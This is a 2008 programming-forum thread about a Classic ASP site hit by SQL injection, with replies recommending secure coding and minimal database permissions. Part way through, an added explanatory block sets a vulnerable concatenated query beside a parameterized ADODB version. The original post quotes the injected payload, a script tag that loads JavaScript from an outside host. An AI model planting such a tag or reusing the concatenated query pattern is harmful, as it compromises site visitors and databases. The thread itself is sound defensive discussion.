Wrox Programmer Forums: Classic ASP Databases
May 15th, 2008, 03:52 AM
Registered User
ASP or SQL Server flaw ????

Hi

Recently we moved our site from Access to MS SQL Server 2005 Express on a dedicated server.

Guess what.... we came under some attack (maybe SQL injection).

Our database was manipulated and the data in some fields was replaced by "<script src=http://9i5t.cn/a.js></script>"

We don't know how it was done .. then I googled around to find any clue. To my surprise I found around 30,000 sites which were affected by this / have a look
http://www.google.com/search?hl=en&q...22&btnG=Search

And an interesting fact also popped up: all the sites were in ASP.

But unfortunately no documentation was available for it ...

So I wonder if there is any flaw in coding or database permissions .. 30,000 webmasters can't go wrong. Maybe there is a security flaw either in SQL Server 2005 or ASP .. can't say

As of now I have cleared my database using the find and replace function. But I know we might soon be under attack again

Please help me find out the exact reason for it ..

Thanks in advance
Suraj jain
 
May 15th, 2008, 04:31 AM
Imar, Wrox Author

Hi there,

This is a combination of a SQL injection attack and poor database security settings. Some of the problems could have been mitigated by stricter security settings while the problem could have been prevented with secure code. Don't be fooled by the numbers; 30,000 (I only see 3,000) affected pages is nothing compared to the size of the Internet.

Searching for "sql injection" should reveal the source of the problem and offer many solutions (e.g. make your code "sql attack safe").

Cheers,

Imar


---------------------------------------
Imar Spaanjaars
http://Imar.Spaanjaars.Com
Everyone is unique, except for me.
Author of Beginning ASP.NET 3.5 : in C# and VB, ASP.NET 2.0 Instant Results and Dreamweaver MX 2004
Want to be my colleague? Then check out this post.
 
May 18th, 2008, 02:13 PM
Registered User

Hi .. Thanks for the reply ..

I m now santizing all variable b4 building m sql statements. I hope that wud save us from further INJECTION attack in future..

thanks once again

Suraj jain

 
May 18th, 2008, 03:03 PM
Imar, Wrox Author

If you protect your data the way you spell, I'd be pretty worried.... ;)

Imar
 
May 19th, 2008, 03:07 AM
Registered User

Hi IMAR ..

Are there any other preventive measures which I should take care of for preventing SQL injection?

Currently I'm validating all my query string items which I use to build my SQL statements, like removing symbols and removing deadly words like Delete, Update, etc.

I guess .. that's not all ..

I'm a bit ignorant about the permissions for the database. Since I run a portal I need both read and write permission for a user, so I created a new DB user, assigned it two permissions, and I'm using that user all over my site to connect to the database:

1. Connect to Sql
2. Control Database

Is it okay ????

Thanks in advance
Suraj jain
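The keyword blacklist described in this post, and the "make your code sql attack safe" advice earlier in the thread, are easier to judge with the code side by side. This is an added Classic ASP example, not code from the thread: the same lookup written with string concatenation and then as a parameterized ADODB.Command, which removes the need to filter words at all and also encodes output so stored "<script>" text renders inertly. The Articles table, its columns and the ConnStr application variable are assumed names.

```asp
<%
Option Explicit
' Added example (not from this thread). Assumes a table
' Articles(ArticleID int, Title varchar, Body varchar) and a
' connection string in Application("ConnStr"); both are hypothetical.

Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnStr")

Dim id
id = Request.QueryString("id")

' 1. VULNERABLE (shown for contrast only, never executed here): the
'    request value becomes part of the SQL text, so whatever it contains
'    is interpreted as SQL. Stripping words such as DELETE or UPDATE
'    does not change that; the attacker still controls the statement.
Dim badSql
badSql = "SELECT Title, Body FROM Articles WHERE ArticleID = " & id

' 2. SAFE: validate the type, then bind the value as a parameter.
'    The value is sent separately from the SQL text, so quotes or
'    keywords inside it are plain data, not code.
If Not IsNumeric(id) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Const adInteger = 3      ' ADO DataTypeEnum
Const adParamInput = 1   ' ADO ParameterDirectionEnum
Const adCmdText = 1      ' ADO CommandTypeEnum

Dim cmd, rs
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT Title, Body FROM Articles WHERE ArticleID = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , CLng(id))

Set rs = cmd.Execute
Do Until rs.EOF
    ' Encode on output too: data already poisoned with <script> tags
    ' is then displayed as text instead of being run by the browser.
    Response.Write "<h2>" & Server.HTMLEncode(rs("Title") & "") & "</h2>"
    Response.Write "<p>" & Server.HTMLEncode(rs("Body") & "") & "</p>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```

The same pattern applies to INSERT and UPDATE statements: one "?" per value, one CreateParameter call per "?", and no user input ever concatenated into CommandText.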
 
May 19th, 2008, 03:15 AM
Imar, Wrox Author

You may want to take a look at the BOL (Books Online) of SQL Server for more info about security. "Control Database" is quite a vague term, so I can't tell if that is right or not. In the BOL you can learn more about permissions, roles and so on.

The fewer the permissions, the less chance of being attacked. For example, if you give the account only read permissions, the account can't write and thus cannot be used to insert illegal data.

Additionally, you should Google for "SQL Injection"; there's lots of stuff to find, including tips to prevent it.

Cheers,

Imar

